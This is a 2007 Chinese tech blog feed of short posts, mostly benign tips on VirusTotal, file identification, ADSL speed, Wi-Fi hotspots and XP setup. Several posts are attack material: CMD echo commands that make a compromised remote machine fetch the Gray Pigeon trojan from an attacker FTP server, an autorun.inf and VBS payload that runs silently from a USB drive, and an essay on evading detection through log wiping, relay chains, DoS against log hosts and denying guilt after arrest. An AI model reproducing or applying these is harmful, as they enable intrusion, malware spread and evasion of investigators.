Description: 在这病毒横行的网络世界里,注重安全的你,最忌讳的就应该是病毒木马的入侵了吧。而病毒木马入侵电脑的一大途径,就是通过伪装或者捆绑网上的各种各样的应用软件来达到感染传播的目的。难道为了安全,我们不再***应用软件么?没有应用软件的电脑,功能将大打折扣,这当然是不能采取的手段。而***杀毒软件也可以一定程度上防止病毒的入侵,但是,一个操作系统里,通常只能***一种杀毒软件,让人不怎么放心。下边,我们将教你如何用30多种杀毒软件为你查毒的方法,相信没有多少病毒木马可以逃过30多种著名的杀毒软件的联合绞杀。
同时用30多种杀毒软件扫描病毒?不会是要我***30多种杀毒软件吧?那我的电脑还能用么?当然不是,事实上,也不推荐在同一个操作系统中***两种以上的杀毒软件,因为这样会引起杀毒软件之间的冲突,那么,用30多个杀毒软件来查毒,该怎么做呢?
我们可以通过http://www.virustotal.com/zh-cn/这个网站来实现同时用30多种杀毒软件的反病毒引擎来帮你扫描文件的目的。该网站最新有了简体中文的支持,对于英文不感冒的朋友可是个不错的选择哦
VirusTotal 简介
VirusTotal 是一款可疑文件分析服务, 通过各种知名反病毒引擎,对您所上传的文件进行检测, 以判断文件是否被病毒, 蠕虫, 木马,以及各类恶意软件感染。
特点:免费,独立的服务。使用多种反病毒引擎。实时自动更新病毒定义库。每款反病毒引擎都将显示详细的结果。实时全球统计数据。
这份列表为参加 VirusTotal服务的公司(和它们的反病毒引擎)。来看看有没有你熟悉的?
AhnLab (V3) Aladdin (eSafe) ALWIL (Avast! Antivirus) Authentium(Command Antivirus) Avira (AntiVir) Bit9 (FileAdvisor) Cat ComputerServices (Quick Heal) Clam*** (Clam***) CA Inc. (Vet) Doctor Web,Ltd. (DrWeb) Eset Software (ESET NOD32) ewido networks (ewidoanti-malware) Fortinet (Fortinet) FRISK Software (F-Prot) F-Secure(F-Secure) Grisoft (***G) Hacksoft (The Hacker) Ikarus Software(Ikarus) Ka ersky Lab (***P) McAfee (VirusScan) Microsoft (MalwareProtection) Norman (Norman Antivirus) Panda Software (PandaPlatinum) Prevx (Prevx1) Rising Antivirus (Rising) Secure Computing(Webwasher) Softwin (BitDefender) Sophos (S***) Su elt Software(Antivirus) Symantec (Norton Antivirus) VirusBlokAda (VBA32)VirusBuster (VirusBuster)
世界上出名的杀毒软件都有了。卡巴斯基、麦咖啡、诺顿、熊猫等等。连我们中国的瑞星也有了,相信很少有病毒能够逃过这些杀毒软件的联合绞杀。
图1 VirusTotal主页面
VirusTotal的使用
VirusTotal使用简单,只需点击VirusTotal主页面上的“浏览”按钮,浏览找到你需要查毒的文件,然后点击“发送文件”就可以把该文件上传到VirusTotal网站来进行多引擎查毒,过一会儿就可以得出各杀毒引擎扫描的结果。(人多的时候可能会出现排队的情况,需等待)。
图2 文件检测无毒时的情况
图3文件检测带毒时的情况
通过鼠标右键查毒
图4 右键菜单
通过email来查毒
( Sun, 29 Jul 2007 14:36:06 +0800 )
Description: 一般的情况下,我们可以通过文件的扩展名(后缀名)来判断文件的类型,从而找到打开它们的对应的程序。而因为某种原因,我们可能会得到一个文件,却是没有扩展名的,那该如何识别它呢?
一、什么是文件类型
文件格式(或文件类型)是指计算机为了存储信息而使用的对信息的特殊编码方式,是用于识别内部储存的资料。例如储存图片的文件格式有(jpg、bmp、gif等),有的媒体格式的(avi、mpeg、rm等),有的储存文字信息的(txt、doc等)。而扩展名可以帮助应用程序识别的文件格式,每一种类型的文件格式都需要用对应的程序才能打开。比如doc格式的文件需要用word来打开。
二、快速识别文件类型
我们需要用到的软件是TrIDNet,通过它我们可以轻松识别某文件的类型,不管它有没有扩展名。点击下载
下载到的文件为压缩格式,解压后运行TrIDNet这个主程序就可以了,绿色版无需***。
图1 程序运行主界面
软件的使用简单,直接点击"browse"然后浏览找到需要识别的文件,确定后就会显示出该文件类型。(也可以直接把需要识别的文件拖入到TrIDNet程序中)
图2 查找到文件类型
而对于没有后缀名的文件,它也可以轻松识别。
图3 轻松识别无后缀名的文件
TrIDNet把可能的文件类型以概率来显示,如果不是第一种的话,你可以尝试其它类型。
( Wed, 18 Jul 2007 14:20:49 +0800 )
Description: 在远程计算机的CMD环境下,如果不能通过IPC$渠道传送文件,那就只有通过FTP下载文件了。
假设我们已经有一个FTP服务器,上面有一个我们配置好的灰鸽子木马文件mhgz.exe,我们应该知道FTP服务器的三个参数:
1、FTP服务器的IP地址:如1.1.1.1
2、FTP服务器的用户名:如test
3、FTP服务器的密 码:如test123
在远程计算机的CMD下依次输入下面的命令:
1、echo open 1.1.1.1test.txt 登陆FTP服务器
2、echo testtest.txt 用户名
3、echo test123test.txt 密码
4、echo bi gt gt;test.txt 开始
5、echo get mhgz.exetest.txt 下载灰鸽子木马
6、echo byetest.txt 关闭FTP服务器
输入上面命令后,在远程计算机上就会生成一个test.txt文件,内容为:
open 1.1.1.1
test123
get mhgz.exe
现在我们在远程计算机上执行下面的命令:
ftp -s:test.txt意思是,读取test.txt里的参数,执行ftp命令,命令执行完后,灰鸽子木马文件mhgz.exe就下载到对方计算机里了。
del c:\test.txt
( Tue, 17 Jul 2007 15:39:05 +0800 )
Description: 不想让别人查看你的硬盘数据?不用加密,另有方法。
第一招:修改注册表来隐藏逻辑硬盘
1、隐藏“我的电脑”中的磁盘驱动器图标
操作步骤如下:
①“开始”→“运行”中输入regedit,打开注册表编辑器。
②进入HKEY_CURRENT_USER \SoftWare \microsoft \
\CurrentVersion \Policies\Explorer分支中。
③在右窗口中新建一个二进值的键值名为“NoDrives”,磁盘驱动器所一一对应的键值如下:A驱为“01000000”,B驱为“02000000”,C驱为“04000000”,D驱为“08000000”,E驱为“10000000”,F驱为“20000000”。即按磁盘驱动器的英文字母顺序(A-Z)从十六进制的二倍数递增。将您所要隐藏的磁盘驱动器所对应的键值按十六进制相加赋值给“NoDrives”,这样,就在“我的电脑”内隐藏起所要隐藏的驱动器了。
这样操作后,进入“MS-DOS方式”还是可以操作的。所以我们还要隐藏“MS-DOS方式”下的磁盘驱动器。
2、隐藏“MS-DOS方式”下的磁盘驱动器
操作步骤如下:
①“开始”→“运行”中输入regedit,打开注册表编辑器。
②进入HKEY_CURRENT_USER \SoftWare \Microsoft \
\CurrentVersion \Policies分枝中。
③在该分枝中新建一个主键“WinOldA ”,在该主键下新建一个DWORD值的键值名“Disabled”,然后将其键值设为“1”。
这样,不管是在“我的电脑”里,或“MS-DOS”方式下都看不见了,怎么样,够Cool吧!^_^不过,只要懂注册表的人可骗不了他。
第二招:利用PartitionMagic隐藏硬盘驱动器
相信大家对这个
PartitionMagic
软件不会太陌生吧,它的不破坏硬盘数据情况下对硬盘分驱的功能确实很不错。不过你有没有想到用它来隐藏硬盘驱动器呢?那就试试看吧!
①运行PQMagic。
②选定一个分区。
③在菜单“Operatio ”中选“Advanced”下的“HidPartition”菜单项,在出现的对话框中点击OK。
④在主窗口下面的两个按钮中点击“A ly”按钮后重新启动。
编辑提示:使用PartitionMagic有一定的危险性,请事先备份好重要资料,以免误操作导致资料丢失。
( Tue, 17 Jul 2007 15:38:31 +0800 )
Description: 据我所知,很多人学习黑客技术都是从如何进入他人系统开始的,到处收集各种exploits、后门、木马等。但是,我最早学习的却不是这些,而是这次我要讲的:黑客自我保护技术。因为,当时(现在我仍然这样认为)我觉得就算你的黑客技术再厉害,能攻入这样那样的系统,但当***给你带上手铐的时候,这一切恐怕一点意义都没有了吧!所以,我认为一个没有绝对自保能力的黑客,根本不能算是黑客。不要用什么我不去非法入侵他人系统,不触犯法律等满口的仁义道德去辩解什么!因为,如果你想在黑客技术上得到提升,就必须不断的入侵。这种灵活复杂的实战经验是模拟攻击环境所不能给予的。也不要认为自己技术高超,不会被***或者安全人员抓到,比你技术高的人多得是,还不是照样进了牢房!当你hack一个饱受入侵之苦而开始对系统安全敏感了的站点时,很可能这就是你的最后一次hack了。
内容:
1.谨慎
自我约束。小心谨慎到什么时候都不会有害处。在入侵一个系统之前,请准确评估你将可能遇到的风险,准备和编写好将要用到的tools,然后,要等待恰当的时机。如果可能的话,先调查好什么时间段服务器处于无人职守状态。做不到这些,你将永远成不了真正的hacker。
有些朋友可能不理解,会认为我太胆小。当然,平时我们入侵的那些小站可能不会给我们带来太大的祸端,但如果你的入侵与金钱和权威挂了钩就完全不一样了。这时,如果你不做好最坏的打算,任何一点小的差错都可能把你击倒。其实,就算你入侵的是个小站,也是存在风险的,要知道,我们正在给别人的工作或生活带来麻烦甚至是恶梦。他们很想阻止你,甚至想把你送入地狱!尽管你可能不认为这是犯罪,但事实是这就是犯罪!
要记住,一旦你被牵扯到一个入侵案件中时,你会发现你的hacker污名可能会跟随你相当长的时间,几年,甚至是一生。任何一个有案底的人都很难找到一份好工作!除非你自己做老板!^_^
当你理解了以上的风险后,请不要认为做额外的反追踪工作而感到愚蠢,不要为别人嘲笑你太谨慎而烦心.不要因为太懒或侥幸而放弃修改log文件!作为一名真正的黑客,你必须做好每一件你要做的事情!
当你认为我说的不是废话而是真理,并且切实的执行了,那么你已经是一个谨慎的hacker了。当你考虑和你聊天的人是否可*,考虑你的Email、QQ、phone没有处于监视中,那么反追踪已经成为你生活的一部分了。如果你不想这么去做,那么请想象一下你被捕时的惨状吧!女友还会跟你吗?你的父母不会流泪吗?你不会失去工作和学习吗?请让这些没有发生的机会吧!如果你到了现在还认为我在浪费你的时间或你不去这么去做,那么请离hack远点。你已经对中国的hacker社会和你的hacker朋友构成了潜在的威胁!
2.基础
如果你从不在***、Email和QQ上谈论hacking相关的话题,并且硬盘上没有敏感的私人数据的话,你可以不往下看了!因为每一个hacker都会与其它一些hacker保持联系,并且把一些相关数据保存在某个地方!如果你是个hacker,请看下面我给出的一点建议。
使用可*的加密程序加密所有敏感数据。
将重要私人数据加密后存储在只有你自己知道的、国外的网络硬盘或稳定的空间上(空间提供商要能做到对用户信息保密)。地址和密码请牢记在大脑里,因为只有这里最安全!(密码的健壮性要好,还要容易记忆,不会轻易被破解)。对数据做一个备份,然后放到安全的地方,最好不是家里(当然也要加密)。
不要用***和你的hacker朋友谈论hack。如果非要谈,最好找公用***(***号码记录不要写在纸上,应该存为一个文件并且多次高强度加密)
如果你认为你的入侵行为很危险,应该考虑干扰方案!网络***,其它Hacker都有可能监视你的行动。如果中国的网络***技术好且拥有先进的设备的话,我想他们可以得到他们想要的任何东西!早就听说国外有种设备可以通过捕获计算机发射的电子脉冲在100米以外监视你的电脑屏幕,不知国内的网络***有没有。
我们这种网虫或者说计算机狂人,很多人都有自己的主页空间帐户、学校网站登陆帐户、公司系统登陆帐户、QQ帐户、Email帐户(这里顺便说一下,最好我们每个人准备两个Email,一个用于和hack圈子里的朋友联系,另一个作为普通的日常应用)等。这里要注意,不要使用这些帐户做任何非法和可能会令他人怀疑的事情!决不能在这些帐户下存储任何和hack有关的信息和tools。和其它hacker交流的Email最好经过PGP加密,因为你的Email对Email服务器的维护者和网警来说是透明的。不要用这些帐号表明你对hack感兴趣,顶多对安全防范感兴趣就行了,再深点就不要了。
对于log文件,我想每个人都很熟悉,我也不想再多说了。提点建议,最好清除logs时不要全部清除,这样等于告诉管理员有人入侵了他的系统,清除和你有关的就行了。
除了logs,其它一些痕迹也一定要注意!比如,我在3389肉鸡上装了个扫描器,扫描完成后记得把扫描结果文件删掉,某些远程控制软件会自动记录你连接过的主机设置,如:Radmin,这也要注意。
好的肉鸡要使用稳妥、安全、隐蔽的后门,不要随便用不熟悉的木马程序。
3.高级
(1)熟练运用Sniffer,并灵活运用这些技巧,可以令我们更安全。
(2)使用跳板。有时我们的hack活动可能会被发现,我就遇到过两次。我们正在hack的站点可能因为某些原因被关掉,这时什么都别管尽快清除痕迹离开,一般不会有什么事情。但如果他们想追踪我们的来路(原因可能是想抓住你,也可能是想看看你的跳板强壮性)就很危险了。这种情况下,如果你使用跳板入侵的话就会给他们的追踪造成困难!下面我说一下跳板的要求:
拥有管理员权限;只作跳板使用,平时不用;定期更换其它的服务器做跳板,至少一个月不在使用原来的跳板。这样他们就很难追踪到我们的痕迹了。
使用多层跳板,他们想追踪就必须一个一个的突破。
(3)堡垒主机。什么是堡垒主机?它是你的多层跳板中直接和你正在使用的主机建立了连接的主机,也就是和你最近的一层跳板。一旦他们能追踪到你的堡垒主机,你就有麻烦了。因为,***只要调查一下就能发现你的存在。因此,堡垒主机应该尽量稳固,并且尽量用国外主机(跳板也应该尽量用国外的)。当然,最根本的是决不能让他们追踪的你的堡垒主机。
(4)如果你入侵的服务器使用了专门的log主机,那么会麻烦一点,一般的log主机很难攻入,这时可以用DoS让它停止工作。
(5)查看一下主机是否***了其它的log软件,如果有的话,应该修改它们生成的logs。
(6)攻入系统后,要时不时的看看管理员是否登陆了,如果管理员登陆了,我们就应该尽快跑路了。
(7)注意蜜罐,好的蜜罐系统是很难发现异常的。这种情况遇到的很少,但不排除可能性。如何发现蜜罐,就看你的思维是否清晰、头脑是否冷静、对系统是否熟悉、敏锐的洞察力、还有的就是运气了。
(8)如果使用了Sniffer,请注意加密Sniffer的输出结果。
4.被怀疑时
一旦上面的一切技巧都没能保护住倒霉的你。你就应该采取一些行动,令他们得不到不利于你的证据!但不要采取攻击性行动,可以以静制动,等上1、2个月看看情况再说。当你被怀疑后,你一定要想办法警告你的hacker朋友不要给你发任何Email,断绝所有与hack有关的联系。加密敏感数据,销毁所有hack数据,帐号数据,***号码等纸张,这些都是网警喜欢要的。这期间可以玩点别的,比如说写个程序什么的(可别傻到编hacker程序哦)。
5.被捕
一旦绝顶倒霉的你真的被捕了,那么你应该注意:
首先,找个律师。和律师商量好对策。
其次,不要相信***找到了关键证据之类的言辞,他们可能是诈供。另外,就算他们有了什么证据也不是没有希望,因为电子方面的东西很容易伪造,比如说:IP地址。因此,在国际上对于其是否可以作为证据一直很有争议。所以,除非你被抓个现形,或者拍下了你hacking的过程,否则不要承认,这么做你可能还有希望。
如果你真的认了罪。记住,一定不要出卖其它的hacker朋友,否则,你可能会遭到报复。再者,这也是起码的职业道德
( Thu, 12 Jul 2007 17:58:19 +0800 )
Description: 思路:双击U盘时既能运行程序又能打开U盘
其实可以用批处理写,但会跳出cmd的黑框框,极为不爽,估计楼主的意思是用VBS,这样可以不闪。
想法不错,我们实现一下,Let's GO!
首先:autorun.inf,内容如下
它们的意思是不管你用双击,还是右键打开,还是资源管理器,都会运行我们的efan.v [autorun]
OPEN=efan.v shell\open=打开(&O)
shell\open\Command=efan.v shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=efan.v efan.v ,内容如下:
set efan=wscript.createobject("wscript.shell")
''run后面的参数加0,就是在后台运行该程序
efan.run "你的程序",0
''打开当前U盘,不能加参数哦
efan.run(Left(WScript.ScriptFullName,3))
''你还可以拷贝到C盘下
efan.run "copy autorun.inf c:\",0
efan.run "attrib c:\autorun.inf +s +h +r",0
( Wed, 11 Jul 2007 17:52:13 +0800 )
Description: 经常使用ADSL的用户,你知道ADSL的真正速度吗?带着这个疑问我们将问题一步一步展开。
很多用户反映,ADSL下载速率并没有达到标称的512K,通过ADSL接入网络后,下载时会出现一个下载速率指示条,上面显示的下载速率一般为50KByte/s左右!这其实是个换算关系不清引起的误会。
1、512KADSL是什么意思?
512K=512K =512Kbits/s=64Kbytes/s
我想这个换算应该没什么问题。
2、64Kbytes/s意味着什么?
这个64K的真正含义是“个人用户所能独享的最大下载带宽”
那么这又是什么意思呢,不知道现在有没有人注意过电信ADSL***的申请表,上面的带宽项目写的是都是不高于512K”,“不高于8M”等等,也就是说我们在正常的情况下可以拥有最多不超过64K的专有带宽。注意是“不高于”,那么也就是说很多时候我们的专有带宽可能小于64K,那有又是为什么呢?
事实上,中国电信的ADSL是运行在ATM上面,ATM到chinanet边缘路由器带宽是155M,每一个边缘路由器可以连接3000用户,如果这些用户同时上网,那么每个用户其实只有50kbit/s的带宽,也就是7Kbytes/s,加上路由器衰减,那么最终可能只有普通modem的速度了。
当然以上只是假想的情况,毕竟3000人同时连在一台边缘路由器上面几乎是不可能的,电信也不会让路由器满负荷连接而使得速度下降如此之巨。
但是,64K是最高专有带宽是毋庸置疑的。
3、那为什么我的512KADSL经常可以达到100K甚至200K以上的下载速度呢?
我们搞清楚了64K是最大专有带宽,但不等于最大带宽,事实上在ADSL拨号时已经分配了实际约等于8M ,也就是1Mbytes/s的下载带宽,只不过电信限制了我们的专有带宽最高64K,那么当路由器连接的用户较少的时候,我们可以获得一部分超过专有带宽的共享带宽(显然电信没必要让这些带宽闲置),当然512K速率的ADSL永远不可能通过占用共享带宽达到1M/s的下载速度,因为毕竟总还是有很多人在同时上网,而且电信肯定还有一些平衡负载的机制。
4、ADSL上传速度对下载的影响
TCP/IP规定,每一个封包,都需要有acknowledge讯息的回传,也就是说,传输的资料,需要有一个收到资料的讯息回复,才能决定后面的传输速度,并决定是否重新传输遗失的资料。
上行的带宽一部分就是用来传输这些acknowledge(确认)资料的,当上行负载过大的时候,就会影响acknowledge资料的传送速度,并进而影响到下载速度。这对非对称数字环路也就是ADSL这种上行带宽远小于下载带宽的连接来说影响尤为明显。有试验证明,当上传满载时,下载速度讲变为理想速度的40%,这就可以解释为什么为什么很多朋友用BT下载的时候稍微限速反而能够获得更大的下载速度。
既然这样我们就不能要求所有的人都不限速,因为对于ADSL用户来说这是很不现实的,也是不科学的。适当的限速是正确的。
5、ADSL的速度随着连接时间的延长而逐渐降低。
前面说过ADSL再拨号的时候会建立最高理论8M 的下载带宽,这个带宽是永远不会改变的!不过实际上由于ADSL的噪声检测机制如果线路情况不好那么一开始建立的连接显然不可能达到理论值,可能最后是5M ,这个带宽也是不会改变的。
那为什么说ADSL的速度会越来越慢呢?
这是因为即使用户不关闭调制解调器的电源,有时ADSL链接也会随时中断。比如,在通信状态因噪音增加而恶化,频繁发生错误的情况下。链接中断后,马上就会重新进行调试,并重新确定链接。不过,如果此时致使链接中断的噪音仍然存在的话,(这一般是比较大的)重新链接后的速度就会比原来更低。由于调试中所确定的链接速度是也固定的,因此即便之后噪音消失以后,链接速度也不会提高。ADSL调制解调器使用时间越长,发生这种情况的可能性就越高,所以连接速度越来越慢。
此时,如果用户重新起动调制解调器,链接就会重新确立,速度就可能由此得以提高。这一常识可用作链接速度降低后的处理对策.
当然上面说的这些情况都只是根据ADSL连接本身来讨论的,实际的情况还包括互联网状况,网站本身的响应等等。
了解了上面的知识,您或许就豁然开朗。原来512K并不是512KB呀,只有64KB,呜呜~~~你也不可能达到每秒512KB的下载速度。
真正实现ADSL的高速
解决ADSL速度时最要重视的一点就是用户主机要达到一定的配置,才能在硬件上保证ADSL接入的速度。俗话说“没有金刚钻,不揽瓷器活”,如果个人电脑的处理性能高,就可以快速运行Web浏览器与邮件软件,提高上网速度。如果***了1M 的ADSL,但个人电脑却只能装
95或98的话,当然会觉得速度慢。尤其是内存如果只有64MB或128MB,宽带就犹如英雄无用武之处。如果更新了个人电脑,操作系统可以使用
XP的话,那自然宽带接入的速度就会提高。另外,
XP比原来的
系统需要更多的内存,建议最少也要有256MB以上的内存。如果没有能力更新个人电脑,那就增加内存,只要增加内存就能感觉到速度提高。此外,宽带接入使用的ADSL调制解调器也要支持高速度,才可以保证接入速度。
还有一些在硬件上对ADSL维护的方法,例如尽量缩短***插座与ADSL调制解调器之间的***线,可以尽量减少线路损耗,具体操作可以缩短***插座与ADSL调制解调器之间的距离、缩短连接调制解调器与个人电脑的网线,就可以减少线路损耗。还有在ADSL调制解调器附近不要放置散发电磁波的办公设备(包括个人电脑)或者电视、冰箱等家电、手机都会给调制解调器带来干扰。
( Wed, 11 Jul 2007 17:44:28 +0800 )
Description: 当你带着笔记本电脑来到一个陌生的、没有网线接入的地方,怎么才能上网?非要购买价格不菲的“随e行”无线上网卡吗?其实不用,很多地方都有免费的“热点”!如何得知附近有哪些“热点”呢?如何查看无线网络的连接速度呢?很多时候我们是凭借经验来判断的,比如,每个星巴克都会提供免费WiFi接入。但这样选择太窄了,总不能没次出门在外想上个网就得去星巴克吧。接下来我们就告诉你,到底如何寻找“热点”!
小提示:什么是“热点”?
所谓“热点”,也就是Hot ot,指提供免费或付费方式获得WiFi服务的地方,实际上就是指这些地方***了无线路由器,有无线上网信号。一般机场、星巴克、麦当劳、肯德基、酒店以及一些其他休闲娱乐场所都有“热点”。
1、快速找到免费的无线网
伙聚网(http://www.hoju.cn)是一个专门提供热点查询、分享的社区类网站,你可以从这里找到你所在地区有哪些地方提供热点。打开http://www.hoju.cn/v1/redianfe u.php,选择好地区、场所后点击“显示热点”即可查到符合你要求的结果。(见图1)
此外,该网站还利用GoogleMa 制作了一个全国热点的分布地图。进入http://map.hoju.cn/,在页面的右下角输入城市、商业区或热点的名字即可搜索获得结果,选择其中一个结果后,地图上会打开该热点所在的区域,并标记。点击其标记,页面上会显示出该热点的详细地址、联系***等信息。(见图2)
2、无线也要高速!
利用伙聚网到是能找到一些热点的所在,但如果你已经到了某个地方,你想知道附近有没有热点覆盖呢?其实也很简单,到http://www.skycn.com/soft/16456.html下载***这款名为Netstumbler的软件,展开“Cha els”,这时候Netstumbler开始进行网络检测、搜索,稍等片刻就能看到结果了。
结果包括SSID、MAC地址、网络速率(Speed)、网络接入类型(Type)、是否有WEP加密(Encryption)等。通过“Speed”一项我们就能看到该热点的无线接入带宽(见图3)。这时候我们只需要将自己的无线网卡接入到合适的AP上,就可以开始网上冲浪了。值得一提的是,NetStumbler可以显示设置了隐藏SSID的无线AP,在软件界面中可以看到该AP的绿灯在不断闪烁。
小知识:什么是SSID?
SSID(Service SetIdentifier,服务设定识别器)用于区别无线网路中的各个客户端。当设定无线访问点/路由器
或网络适配器时,创建了此名称。此名称也是您希望接入的无线网络名称。所有尝试彼此间通信的无线设备必须共享相同的SSID。
3.这里的信号够强吗?
除了扫描无线接入点之外,你还可以利用Netstumbler来检测无线信号的所在位置的强弱。例如在家里,你将无线AP放在书房后,想知道客厅、卧室、厨房等地方无线信号的覆盖情况和强度,可在NetStumbler中选择该无线AP,观察一段时间信号的稳定表现,随着时间的推移便可直观地了解信号的强度。(见图4)
通过这一方法,你便可确定在哪个地方信号比较好,以及如何放置无线AP以让要移动上网的地方信号覆盖充分。
4.我的字典里没有“加密”两个字
对于一般的软件,当遭遇WEP加密时,你无法了该无线网络的结构,不过一款名为AiroPeek的软件可以做到。AiroPeek不是一款纯粹的无线AP搜寻工具,它具备Sniffer之类软件的网络数据包窃取和分析功能,就是对802.11a/b/g协议进行解码,显示管理信息包、控制信息包和数据信息包。
小提示:
AiroPeek支持不同长度的WEP加密数据流的解码,可以通过对密钥的多重命名来进行空中解码,包含一个便捷的命令行来对捕获的加密状态的包文件进行解码,所以即使使用了WEP加密的无线信号依然无法逃过AiroPeek的“手指心”。
下载并运行AiroPeek,可以看到无线网络中的所有节点的IP地址、数据包发送统计等情况,AiroPeek以示意图的形式显示网络拓扑,极为直观地让你了解网络的结构(见图5)。在数据包中包含了各种信息,除了看到来源(Source)和目标(Destination)地址之外,协议(Protocol)可以让我们排序后看到所有与802.11相关的数据包,如果需要还可以深入去分析数据包的内容。
( Mon, 9 Jul 2007 12:10:23 +0800 )
Description: 原来我一直推荐使用组策略来关闭自动播放,今天在论坛看到一个质疑的帖子,帖子试图说明一个观点——避免双击或插入U盘(移动硬盘)中毒的方法,仅靠组策略编辑器是无效的。需要修改相关注册键值。
对此,我小心做了20分钟的测试。测试结果表明——组策略编辑器中禁止所有驱动器的自动播放,是防止双击或插入移动媒体而中毒的最简单有效的方法。长达三年的***经历,我并不认同技术至上。我的理念是最简单,最容易实现的方案,才是客户最需要的方案。
测试用了一个简单的autorun.inf,内容为
[autorun]OPEN=EXPLORER.EXEshell\open=打开(&O)shell\open\Command=EXPLORER.EXEshell\open\Default=1shell\explore=资源管理器(&X)shell\explore\Command=EXPLORER.EXE
为使测试现象更直观,我把notepad.exe复制到U盘,重命名为explorer.exe。
运行,gpedit.msc,在计算机配置,管理模板,系统,右边关闭自动播放双击,选中未配置(我装完系统后,通常会立即修改这个值为所有驱动器),为这个测试,我改回去。重启电脑使配置生效。
然后,双击我的电脑,再双击U盘图标,记事本打开了。再挂载一个
XP的ISO光盘镜像。双击,弹出***
XP的界面。
继续下一步,重新运行gpedit.msc,把禁止自动播放的值修改为所有驱动器,再重启电脑。
双击我的电脑,再双击U盘,双击光盘,均未启动相应程序,而是在当前窗口中显示了根目录下的文件。
这个试验说明,针对病毒在移动媒体创建autorun.inf的作法,最简单有效的防范手段,还是使用组策略,修改计算机配置-管理模板-禁止自动播放,重启电脑。
不推荐把简单问题复杂化,一句话,“简单粗暴,行之有效”。(
( Mon, 9 Jul 2007 12:06:10 +0800 )
Description: 最好是格式化系统分区后干净***:
DOS下FORMAT系统盘,以C为例子:FORMAR C:/Q,如果是PE模式或恢复控制台:FORMAR C:/Q /FS:FAT32
Vista要求是NTFS,把FS参数改为:/FS:NTFS就可以了。
然后加载:smartdrv.exe,WIN98的启动光盘中有,DOS下***XP必须要加载,否则慢到你崩溃。
加载完成后进光盘:这里以ROOT代表光盘根目录:ROOT:\I386\WINNT.EXE
引导完成***。
-----------------------------------------------------------------------------------------------------------------
系统***完成后:
桌面--右键--属性--桌面--桌面图标--全部勾选并取消 桌面清理
桌面--我的电脑--右键--属性--自动更新--关闭自动更新(T)
桌面--我的电脑--右键--属性--系统还原--在所有驱动器上关闭系统还原(T)
「开始」菜单--运行--输入:services.msc--Automatic Updates--停止 已禁用
「开始」菜单--运行--输入:services.msc--System Restore Service--停止 已禁用
(其它的服务按自己的使用环境和习惯设置,很多都是根本用不到的服务,开着就是白白浪费宝贵的系统资源,同时让系统漏洞增加)
我列出一部分除上面两项可以关闭掉的服务:
Server '不打算启用共享的关掉
Error Reporting Service '用不着的东西
Hel and Su ort '相信没有多少人有使用帮助的习惯,改成 手动 ,需要的时候启动就行了
Print Spooler '没有打印机的务必关掉!很多病毒、木马喜欢利用它来伪装自己,本身也有缺陷。
Security Center '你可以运行 EVENTVWR.MSC 看看纪录,关掉后 控制面板 中的 安全中心 也就失效了,如果觉得你用不到,关掉它。
Task Scheduler '开着它就是给你的系统增加危机,部分杀毒软件会使用这个服务,自己看情况,推荐禁用掉。
Theme '不使用XP那些特效和外观可以节省大笔的系统资源,自己看着办,关了它外观就失效了。 Time '和服务器连接以更新你的系统时间的服务,设置为手动就可以了,真有那冲动想和时间服务器同步时再开开它同步一下。
Wirele Zero Configuratio '不使用无线网络的禁掉它,台式大多是没有无线网卡的,笔记本大部分会有,不用的话就关掉。
桌面--我的电脑--右键--属性--高级--环境变量--分别修改用户变量和系统变量中的 TEMP 及 TMP 为别的分区,别放在主分区
(例如:D:\Temp)
桌面--Internet Explorer--右键--属性--常规--Internet 临时文件--设置--移动文件夹--设置到别的分区
桌面--我的电脑--右键--属性--高级--性能--设置--高级--虚拟内存--更改--把系统分区设置为 无分页文件--在别的分区设置一个页面文件
所有更改完成后之后,重新启动计算机,***系统驱动,制作系统镜像。
刚***完系统后的这几步更改可以让你的系统性能和稳定性获得很大程度的提高,镜像文件的大小也会大大缩减,自己根据自己的情况做选择进行修改就行了。
我个人的习惯是不用杀毒软件不用自动更新不用系统还原,所有临时文件均放在下载用的分区里,页面文件也在那个分区里,便于清理。
做系统镜像时不要***任何软件,便于以后更新软件,否则还多了卸载的步骤,还可能残留文件和信息。
( Mon, 9 Jul 2007 11:59:57 +0800 )
Description: 光驱的丢失多数时候是我们在***了新的软件或者新的驱动程序后出现的,也可能是我们无意中修改了CMOS设置或者CONFIG.SYS配置,还有原因是机器感染了病毒等等。
硬件方面的原因
1.数据线接反或者数据线损坏
有时候只是个小毛病,但却会绕一个大圈,这说明要解决问题必须心细,有敏锐的观察力。在光驱丢失时,应首先检查一下光驱的数据线是否接反了(红红相对),是否有松动。如果在确定其他地方没有问题时,并且光驱的数据线经常移动,这时应该更换一条数据线试一试。
2.跳线设置与硬盘有冲突
当光驱的跳线和在同一条数据线上连接的硬盘相同时就会出现找不到光驱(也可能没有硬盘),这时只要将光驱的跳线跳成和硬盘不一样即可。为了提高数据传输率,最好将硬盘和光驱分开在两个IDE接口上。
3.电源线故障,缺少+5V电压或+5V电压供电不正常
这种情况不多出现。由于我们在***光驱或者硬盘时用力过大,使电源的D型插头松动或者由于电脑工作环境的恶劣插头氧化生锈,光驱的电源供给不是很正常(如果是硬盘,读盘声音会异常,并且硬盘表面有大量坏道出现),光驱便也发现不了。
有一次,给客户的IBM电脑主机升级,加装一个光驱。谁知道一个新的40倍光驱装上后无论如何电脑也找不着。光驱出盒正常,也根本想不到是电源的事,只想软件方面的事了。最后实在没着了,拿起万用表一测电压,没有+5V电压。一检查电源线,发现由于的多次拆卸,+5V的红线已经断了,但在外面却还看不出来。一点小问题却费了老大的劲。
4.IDE接口损坏
如果是突然出现光驱的盘符丢失,无法使用光驱,这时我们可以把光驱和硬盘的接口互换一下。如果再次启动后发现能够找到光驱,但却找不到硬盘,这说明是原来接光驱的IDE接口损坏了;如果互换后电脑能够正常启动,但仍旧没有光驱,这说明是光驱自身的原因,这时只能更换光驱。反正,现在一个光驱没有几个钱。
如果在
下没有光驱,我们还可以在DOS(重新启动电脑后按F8进DOS,而非WIN98下的DOS)下用WIN98的万能光驱驱动来试着加载光驱,如果能够加载成功,说明是软件方面的原因,应主要从软件方面查找原因。否则就应从硬件方面来考虑。
软件方面的原因
1.IDE驱动程序***错误或与某个驱动程序有冲突
如果我们在***WIN98或者95时没有将IDE驱动程序正确***,或者在***后当你打开设备管理器查看“硬盘控制器“时发现其中有***叹号时,这时光驱的盘符就可能找不到了。
在正常情况下,当我们进入安全模式时,光驱的盘符是不会有的。如果我们想在安全模式下使用光驱,可以在Autoexec.BAT和Config.sys文件中加载光驱的驱动,这样我们在重新启动电脑后,就可以在安全模式下使用光驱了。
2.CONFIG文件中设置LASTDRIVE数量设置太少
